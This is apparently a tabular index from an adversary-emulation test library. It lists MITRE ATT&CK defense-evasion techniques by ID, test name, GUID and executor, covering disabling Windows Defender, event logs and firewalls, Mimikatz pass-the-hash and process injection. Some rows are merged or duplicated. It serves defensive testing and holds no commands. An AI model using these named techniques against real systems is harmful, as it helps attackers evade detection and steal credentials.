defense-evasion T1140 Deobfuscate/Decode Files or Information 3 Base64 decoding with Python 356dc0e8-684f-4428-bb94-9313998ad608 sh
defense-evasion T1140 Deobfuscate/Decode Files or Information 4 Base64 decoding with Perl 6604d964-b9f6-4d4b-8ce8-499829a14d0a sh
defense-evasion T1140 Deobfuscate/Decode Files or Information 5 Base64 decoding with shell utilities b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e sh
defense-evasion T1140 Deobfuscate/Decode Files or Information 6 Hex decoding with shell utilities 005943f9-8dd5-4349-8b46-0313c0a9f973 sh
270 defense-evasion T1006 Direct Volume Access 1 Read volume boot sector via DOS device path (PowerShell) 88f6327e-51ec-4bbf-b2e8-3fea534eab8b powershell
defense-evasion T1562.008 Disable Cloud Logs 1 AWS CloudTrail Changes 9c10dc6b-20bd-403a-8e67-50ef7d07ed4e sh
defense-evasion T1562.008 Disable Cloud Logs 2 Azure - Eventhub Deletion 5e09bed0-7d33-453b-9bf3-caea32bff719 powershell
defense-evasion T1562.008 Disable Cloud Logs 3 Office 365 - Exchange Audit Log Disabled 1ee572f3-056c-4632-a7fc-7e7c42b1543c powershell
271 defense-evasion T1562.002 Disable Windows Event Logging 1 Disable Windows IIS HTTP Logging 69435dcf-c66f-4ec0-a8b1-82beb76b34db powershell
272 defense-evasion T1562.002 Disable Windows Event Logging 2 Kill Event Log Service Threads 41ac52ba-5d5e-40c0-b267-573ed90489bd powershell
273 defense-evasion T1562.002 T1562.004 Disable Windows Event Logging Disable or Modify System Firewall 3 1 Impair Windows Audit Log Policy Disable iptables firewall 5102a3a7-e2d7-4129-9e45-f483f2e0eea8 80f5e701-f7a4-4d06-b140-26c8efd1b6b4 command_prompt sh
274 defense-evasion T1562.002 T1562.004 Disable Windows Event Logging Disable or Modify System Firewall 4 2 Clear Windows Audit Policy Config Disable Microsoft Defender Firewall 913c0e4e-4b37-4b78-ad0b-90e7b25010f6 88d05800-a5e4-407e-9b53-ece4174f197f command_prompt
defense-evasion T1562.002 Disable Windows Event Logging 5 Disable Event Logging with wevtutil b26a3340-dad7-4360-9176-706269c74103 command_prompt
defense-evasion T1562.002 Disable Windows Event Logging 6 Makes Eventlog blind with Phant0m 3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741 command_prompt
defense-evasion T1562.004 Disable or Modify System Firewall 1 Disable Microsoft Defender Firewall 88d05800-a5e4-407e-9b53-ece4174f197f command_prompt
defense-evasion T1562.004 Disable or Modify System Firewall 2 Disable Microsoft Defender Firewall via Registry afedc8c4-038c-4d82-b3e5-623a95f8a612 command_prompt
275 defense-evasion T1562.004 Disable or Modify System Firewall 3 Allow SMB and RDP on Microsoft Defender Firewall d9841bf8-f161-4c73-81e9-fd773a5ff8c1 command_prompt
276 defense-evasion T1562.004 Disable or Modify System Firewall 4 Opening ports for proxy - HARDRAIN 15e57006-79dd-46df-9bf9-31bc24fb5a80 command_prompt
277 defense-evasion T1562.004 Disable or Modify System Firewall 5 Open a local port through Windows Firewall to any profile 9636dd6e-7599-40d2-8eee-ac16434f35ed powershell
278 defense-evasion T1562.004 Disable or Modify System Firewall 6 Allow Executable Through Firewall Located in Non-Standard Location 6f5822d2-d38d-4f48-9bfc-916607ff6b8c powershell
defense-evasion T1562.004 Disable or Modify System Firewall 7 Stop/Start UFW firewall fe135572-edcd-49a2-afe6-1d39521c5a9a sh
defense-evasion T1562.004 Disable or Modify System Firewall 8 Stop/Start UFW firewall systemctl 9fd99609-1854-4f3c-b47b-97d9a5972bd1 sh
defense-evasion T1562.004 Disable or Modify System Firewall 9 Turn off UFW logging 8a95b832-2c2a-494d-9cb0-dc9dd97c8bad sh
defense-evasion T1562.004 Disable or Modify System Firewall 10 Add and delete UFW firewall rules b2563a4e-c4b8-429c-8d47-d5bcb227ba7a sh
defense-evasion T1562.004 Disable or Modify System Firewall 11 Edit UFW firewall user.rules file beaf815a-c883-4194-97e9-fdbbb2bbdd7c sh
defense-evasion T1562.004 Disable or Modify System Firewall 12 Edit UFW firewall ufw.conf file c1d8c4eb-88da-4927-ae97-c7c25893803b sh
defense-evasion T1562.004 Disable or Modify System Firewall 13 Edit UFW firewall sysctl.conf file c4ae0701-88d3-4cd8-8bce-4801ed9f97e4 sh
defense-evasion T1562.004 Disable or Modify System Firewall 14 Edit UFW firewall main configuration file 7b697ece-8270-46b5-bbc7-6b9e27081831 sh
defense-evasion T1562.004 Disable or Modify System Firewall 15 Tail the UFW firewall log file 419cca0c-fa52-4572-b0d7-bc7c6f388a27 sh
279 defense-evasion T1562.001 Disable or Modify Tools 1 Disable syslog 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8 sh
280 defense-evasion T1562.001 Disable or Modify Tools 2 Disable Cb Response ae8943f7-0f8d-44de-962d-fbc2e2f03eb8 sh
281 defense-evasion T1562.001 Disable or Modify Tools 3 Disable SELinux fc225f36-9279-4c39-b3f9-5141ab74f8d8 sh
300 defense-evasion T1562.001 Disable or Modify Tools 22 Tamper with Windows Defender Evade Scanning -Folder 0b19f4ee-de90-4059-88cb-63c800c683ed powershell
301 defense-evasion T1562.001 Disable or Modify Tools 23 Tamper with Windows Defender Evade Scanning -Extension 315f4be6-2240-4552-b3e1-d1047f5eecea powershell
302 defense-evasion T1562.001 Disable or Modify Tools 24 Tamper with Windows Defender Evade Scanning -Process a123ce6a-3916-45d6-ba9c-7d4081315c27 powershell
defense-evasion T1562.001 Disable or Modify Tools 25 office-365-Disable-AntiPhishRule b9bbae2c-2ba6-4cf3-b452-8e8f908696f3 powershell
defense-evasion T1562.001 Disable or Modify Tools 26 Disable Windows Defender with DISM 871438ac-7d6e-432a-b27d-3e7db69faf58 command_prompt
defense-evasion T1562.001 Disable or Modify Tools 27 Disable Defender with Defender Control 178136d8-2778-4d7a-81f3-d517053a4fd6 powershell
defense-evasion T1562.001 Disable or Modify Tools 28 Disable Defender Using NirSoft AdvancedRun 81ce22fd-9612-4154-918e-8a1f285d214d powershell
defense-evasion T1562.001 Disable or Modify Tools 29 Kill antimalware protected processes using Backstab 24a12b91-05a7-4deb-8d7f-035fa98591bc powershell
defense-evasion T1484.002 Domain Trust Modification 1 Add Federation to Azure AD 8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7 powershell
defense-evasion T1574.006 Dynamic Linker Hijacking 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
defense-evasion T1574.006 Dynamic Linker Hijacking 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
defense-evasion T1055.001 Dynamic-link Library Injection 1 Process Injection via mavinject.exe 74496461-11a1-4982-b439-4d87a550d254 powershell
303 defense-evasion T1070.004 File Deletion 1 Delete a single file - Linux/macOS 562d737f-2fc6-4b09-8c2a-7f8ff0828480 sh
304 defense-evasion T1070.004 File Deletion 2 Delete an entire folder - Linux/macOS a415f17e-ce8d-4ce2-a8b4-83b674e7017e sh
305 defense-evasion T1070.004 File Deletion 3 Overwrite and delete a file with shred 039b4b10-2900-404b-b67f-4b6d49aa6499 sh
311 defense-evasion T1070.004 File Deletion 9 Delete Prefetch File 36f96049-0ad7-4a5f-8418-460acaeb92fb powershell
312 defense-evasion T1070.004 File Deletion 10 Delete TeamViewer Log Files 69f50a5f-967c-4327-a5bb-e1a9a9983785 powershell
313 defense-evasion T1553.001 Gatekeeper Bypass 1 Gatekeeper Bypass fb3d46c6-9480-4803-8d7d-ce676e1f1a9b sh
314 defense-evasion T1562.003 HISTCONTROL 1 Disable history collection 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 sh
315 defense-evasion T1562.003 HISTCONTROL 2 Mac HISTCONTROL 468566d5-83e5-40c1-b338-511e1659628d manual
316 defense-evasion T1564.001 Hidden Files and Directories 1 Create a hidden file in a hidden directory 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be sh
317 defense-evasion T1564.001 Hidden Files and Directories 2 Mac Hidden file cddb9098-3b47-4e01-9d3b-6f5f323288a9 sh
318 defense-evasion T1564.001 Hidden Files and Directories 3 Create Windows System File with Attrib f70974c8-c094-4574-b542-2c545af95a32 command_prompt
320 defense-evasion T1564.001 Hidden Files and Directories 5 Hidden files 3b7015f2-3144-4205-b799-b05580621379 sh
321 defense-evasion T1564.001 Hidden Files and Directories 6 Hide a Directory b115ecaf-3b24-4ed2-aefe-2fcb9db913d3 sh
322 defense-evasion T1564.001 Hidden Files and Directories 7 Show all hidden files 9a1ec7da-b892-449f-ad68-67066d04380c sh
defense-evasion T1564.001 Hidden Files and Directories 8 Hide Files Through Registry f650456b-bd49-4bc1-ae9d-271b5b9581e7 command_prompt
323 defense-evasion T1564.002 Hidden Users 1 Create Hidden User using UniqueID < 500 4238a7f0-a980-4fff-98a2-dfc0a363d507 sh
324 defense-evasion T1564.002 Hidden Users 2 Create Hidden User using IsHidden option de87ed7b-52c3-43fd-9554-730f695e7f31 sh
325 defense-evasion T1564.003 Hidden Window 1 Hidden Window f151ee37-9e2b-47e6-80e4-550b9f999b7a powershell
defense-evasion T1564 Hide Artifacts 1 Extract binary files via VBA 6afe288a-8a8b-4d33-a629-8d03ba9dad3a powershell
defense-evasion T1564 Hide Artifacts 2 Create a Hidden User Called "$" 2ec63cc2-4975-41a6-bf09-dffdfb610778 command_prompt
defense-evasion T1564 Hide Artifacts 3 Create an "Administrator " user (with a space on the end) 5bb20389-39a5-4e99-9264-aeb92a55a85c powershell
defense-evasion T1562.003 Impair Command History Logging 1 Disable history collection 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 sh
defense-evasion T1562.003 Impair Command History Logging 2 Mac HISTCONTROL 468566d5-83e5-40c1-b338-511e1659628d manual
326 defense-evasion T1562.006 Indicator Blocking 1 Auditing Configuration Changes on Linux Host 212cfbcf-4770-4980-bc21-303e37abd0e3 bash
327 defense-evasion T1562.006 Indicator Blocking 2 Logging Configuration Changes on Linux Host Lgging Configuration Changes on Linux Host 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c bash
defense-evasion T1562.006 Indicator Blocking 3 Disable Powershell ETW Provider - Windows 6f118276-121d-4c09-bb58-a8fb4a72ee84 powershell
defense-evasion T1562.006 Indicator Blocking 4 Disable .NET Event Tracing for Windows Via Registry (cmd) 8a4c33be-a0d3-434a-bee6-315405edbd5b command_prompt
defense-evasion T1562.006 Indicator Blocking 5 Disable .NET Event Tracing for Windows Via Registry (powershell) 19c07a45-452d-4620-90ed-4c34fffbe758 powershell
328 defense-evasion T1070 Indicator Removal on Host 1 Indicator Removal using FSUtil b4115c7a-0e92-47f0-a61e-17e7218b2435 command_prompt
329 defense-evasion T1202 Indirect Command Execution 1 Indirect Command Execution - pcalua.exe cecfea7a-5f03-4cdd-8bc8-6f7c22862440 command_prompt
330 defense-evasion T1202 Indirect Command Execution 2 Indirect Command Execution - forfiles.exe 8b34a448-40d9-4fc3-a8c8-4bb286faf7dc command_prompt
331 defense-evasion T1202 Indirect Command Execution 3 Indirect Command Execution - conhost.exe cf3391e0-b482-4b02-87fc-ca8362269b29 command_prompt
332 defense-evasion T1553.004 Install Root Certificate 1 Install root CA on CentOS/RHEL 9c096ec4-fd42-419d-a762-d64cc950627e sh
333 defense-evasion T1553.004 Install Root Certificate 2 Install root CA on Debian/Ubuntu 53bcf8a0-1549-4b85-b919-010c56d724ff sh
334 defense-evasion T1553.004 Install Root Certificate 3 Install root CA on macOS cc4a0b8c-426f-40ff-9426-4e10e5bf4c49 sh command_prompt
335 defense-evasion T1553.004 Install Root Certificate 4 Install root CA on Windows 76f49d86-5eb1-461a-a032-a480f86652f1 powershell
defense-evasion T1553.004 Install Root Certificate 5 Install root CA on Windows with certutil 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f powershell
defense-evasion T1553.004 Install Root Certificate 6 Add Root Certificate to CurrentUser Certificate Store ca20a3f1-42b5-4e21-ad3f-1049199ec2e0 powershell
336 defense-evasion T1218.004 InstallUtil 1 CheckIfInstallable method call ffd9c807-d402-47d2-879d-f915cf2a3a94 powershell
337 defense-evasion T1218.004 InstallUtil 2 InstallHelper method call d43a5bde-ae28-4c55-a850-3f4c80573503 powershell
338 defense-evasion T1218.004 InstallUtil 3 InstallUtil class constructor method call 9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93 powershell
341 defense-evasion T1218.004 InstallUtil 6 InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant 06d9deba-f732-48a8-af8e-bdd6e4d98c1d powershell
342 defense-evasion T1218.004 InstallUtil 7 InstallUtil HelpText method call 5a683850-1145-4326-a0e5-e91ced3c6022 powershell
343 defense-evasion T1218.004 InstallUtil 8 InstallUtil evasive invocation 559e6d06-bb42-4307-bff7-3b95a8254bad powershell
344 defense-evasion T1574.006 LD_PRELOAD 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
345 defense-evasion T1574.006 LD_PRELOAD 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
346 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 1 chmod - Change file or folder mode (numeric mode) 34ca1464-de9d-40c6-8c77-690adf36a135 bash
347 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 2 chmod - Change file or folder mode (symbolic mode) fc9d6695-d022-4a80-91b1-381f5c35aff3 bash
348 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 3 chmod - Change file or folder mode (numeric mode) recursively ea79f937-4a4d-4348-ace6-9916aec453a4 bash
352 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 7 chown - Change file or folder mode ownership only 967ba79d-f184-4e0e-8d09-6362b3162e99 bash
353 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 8 chown - Change file or folder ownership recursively 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 bash
354 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 9 chattr - Remove immutable file attribute e7469fe2-ad41-4382-8965-99b94dd3c13f sh
355 defense-evasion T1078.003 T1127.001 Local Accounts MSBuild 1 Create local account with admin privileges MSBuild Bypass Using Inline Tasks a524ce99-86de-4db6-b4f9-e08f35a47a15 58742c0f-cb01-44cd-a60b-fb26e8871c93 command_prompt
defense-evasion T1078.003 Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
defense-evasion T1127.001 MSBuild 1 MSBuild Bypass Using Inline Tasks (C#) 58742c0f-cb01-44cd-a60b-fb26e8871c93 command_prompt
defense-evasion T1127.001 MSBuild 2 MSBuild Bypass Using Inline Tasks (VB) ab042179-c0c5-402f-9bc8-42741f5ce359 command_prompt
defense-evasion T1553.005 Mark-of-the-Web Bypass 1 Mount ISO image 002cca30-4778-4891-878a-aaffcfa502fa powershell
defense-evasion T1553.005 Mark-of-the-Web Bypass 2 Mount an ISO image and run executable from the ISO 42f22b00-0242-4afc-a61b-0da05041f9cc powershell
defense-evasion T1553.005 Mark-of-the-Web Bypass 3 Remove the Zone.Identifier alternate data stream 64b12afc-18b8-4d3f-9eab-7f6cae7c73f9 powershell
356 defense-evasion T1036.004 Masquerade Task or Service 1 Creating W32Time similar named service using schtasks f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9 command_prompt
357 defense-evasion T1036.004 Masquerade Task or Service 2 Creating W32Time similar named service using sc b721c6ef-472c-4263-a0d9-37f1f4ecff66 command_prompt
defense-evasion T1036 Masquerading 1 System File Copied to Unusual Location 51005ac7-52e2-45e0-bdab-d17c6d4916cd powershell
defense-evasion T1036 Masquerading 2 Malware Masquerading and Execution from Zip File 4449c89b-ec82-43a4-89c1-91e2f1abeecc powershell
defense-evasion T1036.005 Match Legitimate Name or Location 1 Execute a process from a directory masquerading as the current parent directory. 812c3ab8-94b0-4698-a9bf-9420af23ce24 sh
defense-evasion T1036.005 Match Legitimate Name or Location 2 Masquerade as a built-in system executable 35eb8d16-9820-4423-a2a1-90c4f5edd9ca powershell
358 defense-evasion T1112 Modify Registry 1 Modify Registry of Current User Profile - cmd 1324796b-d0f6-455a-b4ae-21ffee6aa6b9 command_prompt
359 defense-evasion T1112 Modify Registry 2 Modify Registry of Local Machine - cmd 282f929a-6bc5-42b8-bd93-960c3ba35afe command_prompt
360 defense-evasion T1112 Modify Registry 3 Modify registry to store logon credentials c0413fb5-33e2-40b7-9b6f-60b29f4a7a18 command_prompt
361 defense-evasion T1112 Modify Registry 4 Add domain to Trusted sites Zone cf447677-5a4e-4937-a82c-e47d254afd57 powershell
362 defense-evasion T1112 Modify Registry 5 Javascript in registry 15f44ea9-4571-4837-be9e-802431a7bfae powershell
defense-evasion T1112 Modify Registry 6 Change Powershell Execution Policy to Bypass f3a6cceb-06c9-48e5-8df8-8867a6814245 powershell
defense-evasion T1112 Modify Registry 7 BlackByte Ransomware Registry Changes - CMD 4f4e2f9f-6209-4fcf-9b15-3b7455706f5b command_prompt
defense-evasion T1112 Modify Registry 8 BlackByte Ransomware Registry Changes - Powershell 0b79c06f-c788-44a2-8630-d69051f1123d powershell
defense-evasion T1112 Modify Registry 9 Disable Windows Registry Tool ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8 command_prompt
defense-evasion T1112 Modify Registry 10 Disable Windows CMD application d2561a6d-72bd-408c-b150-13efe1801c2a powershell
defense-evasion T1112 Modify Registry 11 Disable Windows Task Manager application af254e70-dd0e-4de6-9afe-a994d9ea8b62 command_prompt
defense-evasion T1112 Modify Registry 12 Disable Windows Notification Center c0d6d67f-1f63-42cc-95c0-5fd6b20082ad command_prompt
defense-evasion T1112 Modify Registry 13 Disable Windows Shutdown Button 6e0d1131-2d7e-4905-8ca5-d6172f05d03d command_prompt
defense-evasion T1112 Modify Registry 14 Disable Windows LogOff Button e246578a-c24d-46a7-9237-0213ff86fb0c command_prompt
defense-evasion T1112 Modify Registry 15 Disable Windows Change Password Feature d4a6da40-618f-454d-9a9e-26af552aaeb0 command_prompt
defense-evasion T1112 Modify Registry 16 Disable Windows Lock Workstation Feature 3dacb0d2-46ee-4c27-ac1b-f9886bf91a56 command_prompt
defense-evasion T1112 Modify Registry 17 Activate Windows NoDesktop Group Policy Feature 93386d41-525c-4a1b-8235-134a628dee17 command_prompt
defense-evasion T1112 Modify Registry 18 Activate Windows NoRun Group Policy Feature d49ff3cc-8168-4123-b5b3-f057d9abbd55 command_prompt
defense-evasion T1112 Modify Registry 19 Activate Windows NoFind Group Policy Feature ffbb407e-7f1d-4c95-b22e-548169db1fbd command_prompt
defense-evasion T1112 Modify Registry 20 Activate Windows NoControlPanel Group Policy Feature a450e469-ba54-4de1-9deb-9023a6111690 command_prompt
defense-evasion T1112 Modify Registry 21 Activate Windows NoFileMenu Group Policy Feature 5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4 command_prompt
defense-evasion T1112 Modify Registry 22 Activate Windows NoClose Group Policy Feature 12f50e15-dbc6-478b-a801-a746e8ba1723 command_prompt
defense-evasion T1112 Modify Registry 23 Activate Windows NoSetTaskbar Group Policy Feature d29b7faf-7355-4036-9ed3-719bd17951ed command_prompt
defense-evasion T1112 Modify Registry 24 Activate Windows NoTrayContextMenu Group Policy Feature 4d72d4b1-fa7b-4374-b423-0fe326da49d2 command_prompt
defense-evasion T1112 Modify Registry 25 Activate Windows NoPropertiesMyDocuments Group Policy Feature 20fc9daa-bd48-4325-9aff-81b967a84b1d command_prompt
defense-evasion T1112 Modify Registry 26 Hide Windows Clock Group Policy Feature 8023db1e-ad06-4966-934b-b6a0ae52689e command_prompt
defense-evasion T1112 Modify Registry 27 Windows HideSCAHealth Group Policy Feature a4637291-40b1-4a96-8c82-b28f1d73e54e command_prompt
defense-evasion T1112 Modify Registry 28 Windows HideSCANetwork Group Policy Feature 3e757ce7-eca0-411a-9583-1c33b8508d52 command_prompt
defense-evasion T1112 Modify Registry 29 Windows HideSCAPower Group Policy Feature 8d85a5d8-702f-436f-bc78-fcd9119496fc command_prompt
defense-evasion T1112 Modify Registry 30 Windows HideSCAVolume Group Policy Feature 7f037590-b4c6-4f13-b3cc-e424c5ab8ade command_prompt
defense-evasion T1112 Modify Registry 31 Windows Modify Show Compress Color And Info Tip Registry 795d3248-0394-4d4d-8e86-4e8df2a2693f command_prompt
defense-evasion T1112 Modify Registry 32 Windows Powershell Logging Disabled 95b25212-91a7-42ff-9613-124aca6845a8 command_prompt
defense-evasion T1112 Modify Registry 33 Windows Add Registry Value to Load Service in Safe Mode without Network 1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5 command_prompt
defense-evasion T1112 Modify Registry 34 Windows Add Registry Value to Load Service in Safe Mode with Network c173c948-65e5-499c-afbe-433722ed5bd4 command_prompt
363 defense-evasion T1218.005 Mshta 1 Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject 1483fab9-4f52-4217-a9ce-daa9d7747cae command_prompt
364 defense-evasion T1218.005 Mshta 2 Mshta executes VBScript to execute malicious command 906865c3-e05f-4acc-85c4-fbc185455095 command_prompt
365 defense-evasion T1218.005 Mshta 3 Mshta Executes Remote HTML Application (HTA) c4b97eeb-5249-4455-a607-59f95485cb45 powershell
369 defense-evasion T1218.005 Mshta 7 Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler e7e3a525-7612-4d68-a5d3-c4649181b8af powershell
370 defense-evasion T1218.005 Mshta 8 Invoke HTML Application - JScript Engine with Inline Protocol Handler d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840 powershell
371 defense-evasion T1218.005 Mshta 9 Invoke HTML Application - Simulate Lateral Movement over UNC Path b8a8bdb2-7eae-490d-8251-d5e0295b2362 powershell
372 defense-evasion T1218.005 T1218.007 Mshta Msiexec 10 1 Mshta used to Execute PowerShell Msiexec.exe - Execute Local MSI file 8707a805-2b76-4f32-b1c0-14e558205772 0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8 command_prompt
373 defense-evasion T1218.007 Msiexec 1 2 Msiexec.exe - Execute Local MSI file with embedded JScript Msiexec.exe - Execute Remote MSI file a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04 bde7d2fe-d049-458d-a362-abda32a7e649 command_prompt
374 defense-evasion T1218.007 Msiexec 2 3 Msiexec.exe - Execute Local MSI file with embedded VBScript Msiexec.exe - Execute Arbitrary DLL 8d73c7b0-c2b1-4ac1-881a-4aa644f76064 66f64bd5-7c35-4c24-953a-04ca30a0a0ec command_prompt
defense-evasion T1218.007 Msiexec 3 Msiexec.exe - Execute Local MSI file with an embedded DLL 628fa796-76c5-44c3-93aa-b9d8214fd568 command_prompt
defense-evasion T1218.007 Msiexec 4 Msiexec.exe - Execute Local MSI file with an embedded EXE ed3fa08a-ca18-4009-973e-03d13014d0e8 command_prompt
defense-evasion T1218.007 Msiexec 5 WMI Win32_Product Class - Execute Local MSI file with embedded JScript 882082f0-27c6-4eec-a43c-9aa80bccdb30 powershell
defense-evasion T1218.007 Msiexec 6 WMI Win32_Product Class - Execute Local MSI file with embedded VBScript cf470d9a-58e7-43e5-b0d2-805dffc05576 powershell
defense-evasion T1218.007 Msiexec 7 WMI Win32_Product Class - Execute Local MSI file with an embedded DLL 32eb3861-30da-4993-897a-42737152f5f8 powershell
defense-evasion T1218.007 Msiexec 8 WMI Win32_Product Class - Execute Local MSI file with an embedded EXE 55080eb0-49ae-4f55-a440-4167b7974f79 powershell
defense-evasion T1218.007 Msiexec 9 Msiexec.exe - Execute the DllRegisterServer function of a DLL 0106ffa5-fab6-4c7d-82e3-e6b8867d5e5d command_prompt
defense-evasion T1218.007 Msiexec 10 Msiexec.exe - Execute the DllUnregisterServer function of a DLL ab09ec85-4955-4f9c-b8e0-6851baf4d47f command_prompt
defense-evasion T1218.007 Msiexec 11 Msiexec.exe - Execute Remote MSI file 44a4bedf-ffe3-452e-bee4-6925ab125662 command_prompt
375 defense-evasion T1564.004 NTFS File Attributes 1 Alternate Data Streams (ADS) 8822c3b0-d9f9-4daf-a043-49f4602364f4 command_prompt
376 defense-evasion T1564.004 NTFS File Attributes 2 Store file in Alternate Data Stream (ADS) 2ab75061-f5d5-4c1a-b666-ba2a50df5b02 powershell
377 defense-evasion T1564.004 NTFS File Attributes 3 Create ADS command prompt 17e7637a-ddaf-4a82-8622-377e20de8fdb command_prompt
379 defense-evasion T1070.005 Network Share Connection Removal 1 Add Network Share 14c38f32-6509-46d8-ab43-d53e32d2b131 command_prompt
380 defense-evasion T1070.005 Network Share Connection Removal 2 Remove Network Share 09210ad5-1ef2-4077-9ad3-7351e13e9222 command_prompt
381 defense-evasion T1070.005 Network Share Connection Removal 3 Remove Network Share PowerShell 0512d214-9512-4d22-bde7-f37e058259b3 powershell
defense-evasion T1070.005 Network Share Connection Removal 4 Disable Administrative Share Creation at Startup 99c657aa-ebeb-4179-a665-69288fdd12b8 command_prompt
defense-evasion T1070.005 Network Share Connection Removal 5 Remove Administrative Shares 4299eff5-90f1-4446-b2f3-7f4f5cfd5d62 command_prompt
382 defense-evasion T1027 Obfuscated Files or Information 1 Decode base64 Data into Script f45df6be-2e1e-4136-a384-8f18ab3826fb sh
383 defense-evasion T1027 Obfuscated Files or Information 2 Execute base64-encoded PowerShell a50d5a97-2531-499e-a1de-5544c74432c6 powershell
384 defense-evasion T1027 Obfuscated Files or Information 3 Execute base64-encoded PowerShell from Windows Registry 450e7218-7915-4be4-8b9b-464a49eafcec powershell
385 defense-evasion T1027 Obfuscated Files or Information 4 Execution from Compressed File f8c8a909-5f29-49ac-9244-413936ce6d1f command_prompt
defense-evasion T1027 Obfuscated Files or Information 5 DLP Evasion via Sensitive Data in VBA Macro over email 129edb75-d7b8-42cd-a8ba-1f3db64ec4ad powershell
defense-evasion T1027 Obfuscated Files or Information 6 DLP Evasion via Sensitive Data in VBA Macro over HTTP e2d85e66-cb66-4ed7-93b1-833fc56c9319 powershell
defense-evasion T1027 Obfuscated Files or Information 7 Obfuscated Command in PowerShell 8b3f4ed6-077b-4bdd-891c-2d237f19410f powershell
defense-evasion T1027 Obfuscated Files or Information 8 Obfuscated Command Line using special Unicode characters e68b945c-52d0-4dd9-a5e8-d173d70c448f manual
386 defense-evasion T1218.008 Odbcconf 1 Odbcconf.exe - Execute Arbitrary DLL 2430498b-06c0-4b92-a448-8ad263c388e2 command_prompt
387 defense-evasion T1134.004 Parent PID Spoofing 1 Parent PID Spoofing using PowerShell 069258f4-2162-46e9-9a25-c9c6c56150d2 powershell
388 defense-evasion T1134.004 Parent PID Spoofing 2 Parent PID Spoofing - Spawn from Current Process 14920ebd-1d61-491a-85e0-fe98efe37f25 powershell
391 defense-evasion T1134.004 Parent PID Spoofing 5 Parent PID Spoofing - Spawn from New Process 2988133e-561c-4e42-a15f-6281e6a9b2db powershell
392 defense-evasion T1550.002 Pass the Hash 1 Mimikatz Pass the Hash ec23cef9-27d9-46e4-a68d-6f75f7b86908 command_prompt
393 defense-evasion T1550.002 Pass the Hash 2 crackmapexec Pass the Hash eb05b028-16c8-4ad8-adea-6f5b219da9a9 command_prompt
defense-evasion T1550.002 Pass the Hash 3 Invoke-WMIExec Pass the Hash f8757545-b00a-4e4e-8cfb-8cfb961ee713 powershell
394 defense-evasion T1550.003 Pass the Ticket 1 Mimikatz Kerberos Ticket Attack dbf38128-7ba7-4776-bedf-cc2eed432098 command_prompt
defense-evasion T1550.003 Pass the Ticket 2 Rubeus Kerberos Pass The Ticket a2fc4ec5-12c6-4fb4-b661-961f23f359cb powershell
395 defense-evasion T1556.002 Password Filter DLL 1 Install and Register Password Filter DLL a7961770-beb5-4134-9674-83d7e1fa865c powershell
396 defense-evasion T1574.009 Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
defense-evasion T1556.003 Pluggable Authentication Modules 1 Malicious PAM rule 4b9dde80-ae22-44b1-a82a-644bf009eb9c sh
defense-evasion T1556.003 Pluggable Authentication Modules 2 Malicious PAM module 65208808-3125-4a2e-8389-a0a00e9ab326 sh
397 defense-evasion T1055.012 Process Hollowing 1 Process Hollowing using PowerShell 562427b4-39ef-4e8c-af88-463a78e70b9c powershell
398 defense-evasion T1055.012 T1055 Process Hollowing Process Injection 2 1 RunPE via VBA Process Injection via mavinject.exe 3ad4a037-1598-4136-837c-4027e4fa319b 74496461-11a1-4982-b439-4d87a550d254 powershell
defense-evasion T1055 Process Injection 1 Shellcode execution via VBA 1c91e740-1729-4329-b779-feba6e71d048 powershell
defense-evasion T1055 Process Injection 2 Remote Process Injection in LSASS via mimikatz 3203ad24-168e-4bec-be36-f79b13ef8a83 command_prompt
399 defense-evasion T1216.001 PubPrn 1 PubPrn.vbs Signed Script Bypass 9dd29a1f-1e16-4862-be83-913b10a88f6c command_prompt
400 defense-evasion T1218.009 Regsvcs/Regasm 1 Regasm Uninstall Method Call Test 71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112 command_prompt
401 defense-evasion T1218.009 Regsvcs/Regasm 2 Regsvcs Uninstall Method Call Test fd3c1c6a-02d2-4b72-82d9-71c527abb126 powershell
403 defense-evasion T1218.010 Regsvr32 2 Regsvr32 remote COM scriptlet execution c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36 command_prompt
404 defense-evasion T1218.010 Regsvr32 3 Regsvr32 local DLL execution 08ffca73-9a3d-471a-aeb0-68b4aa3ab37b command_prompt
405 defense-evasion T1218.010 Regsvr32 4 Regsvr32 Registering Non DLL 1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421 command_prompt
defense-evasion T1218.010 Regsvr32 5 Regsvr32 Silent DLL Install Call DllRegisterServer 9d71c492-ea2e-4c08-af16-c6994cdf029f command_prompt
